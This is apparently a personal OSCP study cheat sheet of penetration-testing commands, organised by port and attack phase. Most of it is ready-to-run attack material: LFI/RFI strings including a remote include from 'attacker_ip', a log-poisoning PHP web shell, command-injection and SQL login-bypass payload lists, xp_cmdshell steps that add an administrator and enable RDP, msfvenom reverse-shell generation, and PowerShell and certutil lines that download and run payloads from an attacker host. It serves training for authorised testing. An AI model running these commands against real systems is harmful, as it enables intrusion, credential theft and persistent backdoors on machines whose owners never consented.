Penetration Testing CheatSheet
While i was Studying for OSCP from various sources. I took note, made a quick cheat sheet, so that i don’t need to search same thing again and again. I am sharing this cheat sheet as i think it might be useful for someone.
Enumeration
Enumeration is most important part. All finding should be noted for future reference. Without enumeration, we will have hard time to exploit the target.
Basic Enumeration
Whenever I start pentesting an IP address, My First starting favorite tool is nmap. While nmap keep scanning, in other side using browser I try connecting to some common port like firefox 10.10.1.10:8080.
Port Scanning & Service identifying
#Scan for all ports
$ nmap -vvv -Pn -p- -oN allports $target
#Scan for quick UDP ports
$ nmap -sU -v -oN udpPorts $targets
Filter all open ports for nmap script scanning:
$ grep '/tcp' allports | awk -F "/" '{print $1}'| tr '\n' ',';echo
#copy and paste the ports list to nmap '-p' and scan
$ nmap -sC -sV -p 1,2,3,4 -oN scriptscan $target
Automated Enumeration Script
Download: https://github.com/21y4d/nmapAutomator
./nmapAutomator.sh $target_ip All
Other Interesting tools
binwalk <image>
strings -n 8 <image/file>
steghide info <image>
strace <file>
ltrace <file>
file <file>
ls -la <file>
Pentesting Specific Service
If we have found some ports open, we can use below methods to enumerate them!
Port 21(FTP)
Scan FTP with Nmap
nmap -vvv -sC -p21 $target<
Login and Upload backdoor
ftp $target
ftp> USER anonymous
ftp> PASS anon@bytefellow.com
ftp> binary
ftp> upload path/file_name.ext
Port 22(SSH)
Banner Grab
ssh root@target
Quick Brute Forces
hydra -l root -P wordlist ssh://target_ip
Port 25(SMTP)
Username Enumeration. Useful for brute forcing
$ nc $target 25
VRFY username
Port 53(DNS)
Forward Lookup:
for dns in $(cat namelist.txt);do host $dns.google.com;done|grep "has address"
Reverse Lookup:
for adr in $(seq 164 167); do host $ip.$adr;done|grep "pointer"
Test for Zone transfer from your kali machine
$ host -t ns google.com
google.com name server ns3.google.com.
google.com name server ns2.google.com.
google.com name server ns4.google.com.
google.com name server ns1.google.com.
#Zone Transfer. If enabled, should list address!
$ host -l google.com ns4.google.com
Using domain server:
Name: ns4.google.com
Address: 216.239.38.10#53
Aliases:
; Transfer failed.
$ dnsrecon -d bytefellow.com -t axfr #Zone Transfer
dnsenum -f namelist.txt bytefellow.com #brute force domain name
#
Enumerate using nslookup,dig and gobuster:
$ nslookup
>server $target_ip
.
.
>$target_ip
13.10.10.10.in-addr.arpa name = ns1.cronos.htb.
$ dig axfr cronos.htb @10.10.10.13
$ gobuster dns -d cronos.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
Other tools to try:
host -l target name_server #Zone Transfer
dnsrecon -d target.com -t axfr #Zone Transfer
dnsrecon -d target.com -D ~/words.txt -t brt #brute force domain.
dnsenum target #Zone transfer
Port 79(Finger)
If finger service is running, it is possible to enumerate username.
nmap -vvv -Pn -sC -sV -p79 $target
Port 80/443(HTTP/HTTPS)
What to check?
Manually Browse the links. Identify used Technology. Search for Vulnerability with identified info. Gather information from SSL. Check if it has any proxy related vulnerability. Brute force for Directory, Sensitive files. Check for hidden params. Find all inputs point. Find subdomains. View html sources, and also Browse Manually
http://ip/robots.txt http://ip/sitemap.xml http://ip/not_exist Identify Technology using whatWeb
whatweb -a 3 $target
Scan using Nikto
nikto -h $target
If any CMS identified
wpscan --url http://$target -e p,t,u --detection-mode aggressive > wpscan.log #For wordpress scanning
wpscan -e vp --plugins-detection aggressive --api-token API_KEY --url http://172.31.1.8 #Scan for vulnerable plugins with API
droopescan scan drupal http://$target -t 32 # if drupal found
joomscan --ec -u $target #if joomla found
Brute Force Directory and Files
First use small common wordlist Then Big Word list Try with CMS related wordlist Word list File in Kali Linux:
/usr/share/dirbuster/wordlists/directory-list-1.0.txt
/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
/usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
/usr/share/dirb/wordlists/big.txt
/usr/share/dirb/wordlists/catala.txt
/usr/share/dirb/wordlists/common.txt
/usr/share/dirb/wordlists/small.txt
Brute force directory and files using Gobuster:
#scan only for directory
gobuster dir -u http://host/ -t 15 -w /usr/share/dirb/wordlists/common.txt
#Scan for directory, and files extension of php,txt or conf
gobuster dir -u http://host/ -t 15 -w /usr/share/dirb/wordlists/common.txt -x .php,.txt,.conf
#ignore Certificate check
gobuster dir -u https://host/ -t 15 -w /usr/share/dirb/wordlists/common.txt -x .php,.txt,.conf -k
Password brute Forcing(wordpress example) using hydra:
hydra -L lists/usrname.txt -P lists/pass.txt localhost -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
LFI and RFI
If the URL parameter has file name, we can try to vulnerability for LFI/RFI. We should request invalid file and see if any error is displayed!
#target url
http://site/index.php?file=mail.php
# Display any Error? We may get error by requesting invalid file, like: Warning: include(files/ninevehNotes):
failed to open stream: No such file or directory in /var/www/html/direcotry/note.php on line 21
http://site/index.php?file=invalid.php
#Exploit
file=/etc/passwd
file=../../../../etc/passwd
file=/etc/passwd%00
file=/var/log/httpd-access.log
file=php://filter/read=convert.base64-encode/resource=/etc/passwd
file=php://filter/read=convert.base64-encode/resource=index
#May need to try different way to find the exploit:
file=thefile/note/../../../../../../../../../etc/passwd
#Remote file Inclusion!
file=http://attacker_ip/shell.txt
LFI Can execute code!
#Find or guess where the logs files are exist, such as:
file=/usr/local/etc/apache24/httpd.conf
Modify the User agent of header and send using CURL or Burpsuite or even netcat:
User-Agent: bytefellow: <?php system($_GET['cmd']); ?>
Now execute command:
http://target/file.php?file=/var/log/access.log&cmd=id
Command Execution
If found any parameters or input fields, we can try for command execution. Test Every parameters and input fields with these payload(Better to use burp suite intruder):
#For Linux
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
<!--#exec%20cmd="/usr/bin/id;-->
<!--#exec%20cmd="/usr/bin/id;-->
/index.html|id|
;id;
;id
;netstat -a;
;system('cat%20/etc/passwd')
;id;
|id
|/usr/bin/id
|id|
|/usr/bin/id|
#For Windows
| dir
; dir
$(dir)
& dir
&&dir
&& dir
| dir C:\
; dir C:\
& dir C:\
&& dir C:\
dir C:\
| dir C:\Documents and Settings*
; dir C:\Documents and Settings*
& dir C:\Documents and Settings*
&& dir C:\Documents and Settings*
dir C:\Documents and Settings*
| dir C:\Users
; dir C:\Users
SQLi for Login Bypass
If any login page found, should be tried to bypass password check. These payload copied from: https://github.com/payloadbox/sql-injection-payload-list
'-'
' '
'&'
'^'
'' ' or ''-' ' or '' ' ' or ''&' ' or ''^' ' or '''
"-"
" "
"&"
"^"
"" " or ""-" " or "" " " or ""&" " or ""^" " or """
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
Exploiting WebDav
If one method fail, another should be tested. If nothing work, Find different exploit!
Method 1:
davtest -url http://$target/webdav
cadaver http://$target/webdav
> put test.php
Method 2:
cp /usr/share/webshells/php/simple-backdoor.php bytef.php
curl -T 'bytef.php' 'http://ip/webdav/'
Method 3:
nmap -p 80 $ip_address –script http-put –script-args http-put.url=’/webdav/bytef.php’,http-put.file=’backdoor/bytef.php’
Port 110(POP3)
Found an user login information?
$ nc -vvv $target 110
USER test
PASS test
#list all mails
LIST
#Retrive the mail
retr mail_number
Port 111 (RPCINFO)
Connect with Null session.
nmap -v -p 111 --script=nfs* $ip
rpcclient -U "" $target
rpcclient $> enumdomusers
rpcclient $> queryuser 0xrid_ID
Port 137,138,139
nmblookup -A <IP>
nbtscan <IP>/30
sudo nmap -sU -sV -T4 --script nbstat.nse -p137,138,139 -Pn -n <IP>
Port 445(SMB)
There is a big chance getting sensitive information with SMB!
Enumerating SMB
#Enumerate
nmap -v -p 139,445 --script=smb-os-discovery smb-ls smb-enum-users smbenum-shares smb-enum-sessions smb-system-info $ip
#Scan for Vulnerability
nmap -v -p 139,445 --script=smb-vuln-* --script-args=unsafe= $ip
#Other tools
enum4linux -a $target
smbmap -h $target
smbclient -L -N //$target
smbclient -L -U username //$ip
Connecting to share without password(Anonymous login)
smbclient -N //$ip/share
>recurse on
>prompt off
>cd directory
>mget directory
Login with Password
smbclient -U username //$ip/share
Port 389(LDAP)
ldapsearch -h $ip -x -s base namingcontexts
ldapsearch -h $ip -x -b "DC=cascade,DC=local" '(objectClass=person)' > persons
Port 1433(MSSQL)
Reference: https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
brute force for “SA” password
hydra -l sa -P password.txt -V $ip mssql
Connect to MSSQL Server:
sqsh -S server_address -U sa -P password
Enable xp_cmdshell:
exec sp_configure 'show advanced options', 1
go
reconfigure
go
exec sp_configure 'xp_cmdshell', 1
go
reconfigure
go
Execute System Command:
xp_cmdshell 'net user byte bytepass /add'
go
xp_cmdshell 'net localgroup Administrators byte /add'
go
xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
go
Port 2049(NFS)
Enumerate shares
nmap -v -p 2049 --script=nfs* $ip
showmount -e $ip
showmount -a $ip
Mount shares in Kali Machine
mount -t nfs -o vers=2 target_ip:/home local_folder/ -o nolock
After mounting the filesystem if we don’t have read/write permission, we need to edit /etc/passwd and change UUID:
root@kali:/home/bytef//nfs# adduser pwn
Adding user `pwn' ...
Adding new group `marcus' (1001) ...
Adding new user `marcus' (1001) with group `marcus' ...
Creating home directory `/home/pwn' ...
Copying files from `/etc/skel' ...
New password:
Retype new password:
passwd: password updated successfully
Changing the user information for pwn
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n] y
root@kali:/home/bytef/nfs# nano /etc/passwd
marcus@1016:1016:,,,:/home/pwn:/bin/bash
root@kali:/home/bytef/nfs# su pwn
Now we can write files to the target folder of the network filesystem. For example:
pwn@kali:/home/bytef/nfs/pwn$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/pwn/.ssh/id_rsa): /home/bytef/pwn/.ssh
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/bytef/nfs/pwn/.ssh
Your public key has been saved in /home/bytef/nfs/pwn/.ssh.pub
The key fingerprint is:
SHA256:/PH2zrnWxuuT18DFMZvN7WGS7ltUKdz4N+iYjTEZYiQ4 pwn@kali
The key's randomart image is:
+---[RSA 3072]----+
| . . |
| E . o |
| o o |
| .o . o|
| S.. *o|
| .oo. oo%|
| +. o+ &X|
| o.+o=O@|
| . BX*B|
+----[SHA256]-----+
Port 3306(MYSQL)
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,
mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,
mysql-variables,mysql-vuln-cve2012-2122 <IP>
Port 3389(RDP)
Connect to RDP
xfreerdp /u:username /p:password /cert:ignore /v:MACHINE_IP
Quick Brute force if a valid username found:
hydra -l username -P /usr/share/wordlists/rockyou.txt -t 5 -V ip_address rdp
Add user to RDP Group
net localgroup "Remote Desktop Users" username /add
Port 5900/5800(VNC)
Scan with nmap
nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 5900,5800 $ip
Connect using vncviewer from Kali
vncviewer [-passwd passwd.txt] <IP>::5901
Password Attack
Sometime we need to do password guessing(We should!). For better success rate we need a good password dictionary. Also we should search for default credential online!
I have collected some Username and password for quick brute force, usually used for CTF. These list could be used to exploit weak password. Uploaded in GitHub:
Common Username Common Password
Common password
/usr/share/wordlists/rockyou.txt
/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt
Generate Password using cewl
cewl -m 2 -d 5 -a -w pass1.txt http://$ip_address/dir/index.php
Brute Force using Burp
If it is an web form we can brute force in intruder and match grep. Some screenshot from burp suit:
To brute force web form with the hydra, we need to grab the post data from the burp suite carefully. Otherwise, we will get false positive and waste lots of time! I tried to brute force otrs and it worked.
Brute Force using Hydra
hydra -l root@localhost -V -P pass1.txt $target_address.com http-form-post "/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=240&User=^USER^&Password=^PASS^:F=Login failed! Your user name or password was entered incorrectly.:H=Cookie: OTRSBrowserHasCookie=1"
hydra -l root@localhost -V -P pass1.txt $target_address.com http-form-post "/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=240&User=^USER^&Password=^PASS^:F=Login failed!"
Vulnerability and Exploitation
We have enumerated our target. Now Find vulnerabilities!
Find Vulnerability using Nmap
nmap -Pn -p 80,139,445,21 --script vuln $target
Using Searchsploit
#update database
searchsploit -u
#Searching variation
searchsploit afd windows local
searchsploit kernel 2.6
searchsploit oracle windows
#this will copy the exploit to current directory
searchsploit -m exploit_id
Find Exploits using Google
Three kind of search should be enough to find an working exploit
service_version Exploit
site: github.com service_version exploit
site: exploit-db.com service_version exploit
Working with Public Exploits
A public exploit might be coded in python, ruby, c/c++ or any other language. Before executing the exploit:
Read the instruction Carefully. Edit Target address, Reverse connection ip and Ports.
Working with Shell
We have exploited vulnerability and got shell. Now what? Upgrade shell? Privilege escaltion? Fix shell issue?
Backdoor Files in Kali
Kali already has some web shells.
/usr/share/webshells
Quick Shell in Different language
Here it is: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
<?php system("whoami"); ?>
<?php system($_GET['cmd']); ?>
<?php echo exec("whoami");?>
Generate using msfvenom
#Staged windows Payload
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > reverse-x86.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > reverse-x64.exe
#Stageless Windows payload
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > reverse-x86.exe
#Linux Stageless Payload
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > reverse-x86.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > reverse-x64.elf
#Linux Staged Payload
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > reverse-x86.elf
msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > reverse-x64.elf
#Other Platform
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > reverse.php
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > reverse.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > reverse.jsp
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > reverse.asp
#Generate powershell payload
msfvenom -p windows/x64/powershell_reverse_tcp -o psh.ps1 -a x64 --platform windows LHOST=192.168.88.251 LPORT=8080
#Generate Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f
Upgrading Shell
Listening for Connection
nc -lvp 1337
Upgrade your unstable shell!
python -c 'import pty;pty.spawn("/bin/bash")'
^Z
stty raw -echo
fg
Running Python 3 http Server
#Python 3
python3 -m http.server
#python 2
python -m SimpleHTTPServer
Uploading Shell/File
After getting shell, we may need to upload additional files or stable backdoor.
Start HTTP server in Kali:
python3 -m http.server
If target OS is Linux:
wget http://host:8000/file.bin -O /dev/shm/filename.bin
curl http://host:8000/file.bin -o /dev/shm/filename.bin
If target OS is Windows:
#Download and Execute powershell script
powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.15/Invoke-PowerShellTcp.ps1')
(New-Object Net.WebClient).DownloadFile("http://host/shell.exe","C:\Windows\Temp\shell.exe")
Invoke-WebRequest "http://host/shell.exe" -OutFile "shell.exe"
powershell.exe -c Invoke-WebRequest 10.10.0.67:8000/shell.exe -OutFile shell.exe
certutil -urlcache -split -f http://10.10.0.67:8000/shell.exe c:\windows\Temp\shell.exe && c:\windows\Temp\shell.exe
#Transfer with SMB Share. Attacker machine SMB server should be running
copy //host/shell.exe /path/shell.exe
Transfer file using impacket samba script:
#In kali start SMB Server
python3 smbserver.py byte /home/bytef/files
#on the victim machine view the share name
net view \\kali_ip
net use \\10.10.14.6\byte
#copy the file from shared folder
copy \\kali_ip\byte\file.ext file.ext
Piviot/Tunnel/Port Forwarding
Port forward is required when we can’t access an specific service or other internal machine from our kali machine!
Local Port Forwarding
Have SSH access with low privileges? and There are some ports open internally? Try Local Port Forwarding.
-L = Kali’s Port -R = Kali Port $ip:3306 is the port from target
ssh –L 3306:$ip:3306 user@$target_ip
Remote Port Forwarding
No SSH Access but limited shell? Also some weird port is open? Upload plink and Try Remote port forward with plink
ssh –R 3306:localhost:3306 root@kali_ip
ssh –R 3306:localhost:3306 -o "UserKnownHostFile=/dev/null" -o "UserHostKeyChecking=no" root@kali_ip
Connect to the tunneled port:
#Verify with nc
nc -vvv localhost 3306
#If mysql
mysql -u username -p -h 127.0.0.1 -P 3306
Dynamic Port Forwarding(Socks4)
Dynamic Port Forwarding from victim machine(Socks Proxy):
ssh -D 8080 -f -N user@$target_ip
With Dynamic Port Forwarding We can access/browse any ip range of the victim machine. We just need to configure proxychains.conf as follows:
nano /etc/proxychains.conf
...
.
.
....
socks4 127.0.0.1 8080
Now we can use any application through proxychains… such as:
proxychains firefox
proxychains nmap -sT -Pn -p139,445 $ip
Port Forwarding using Plink.exe
Remote Port Forwarding using Plink. Needed When we don’t have access to specific port on target box!
plink.exe -ssh -l kali_user -pw kali_password -R $kali_ip:445:127.0.0.1:445 $kali_ip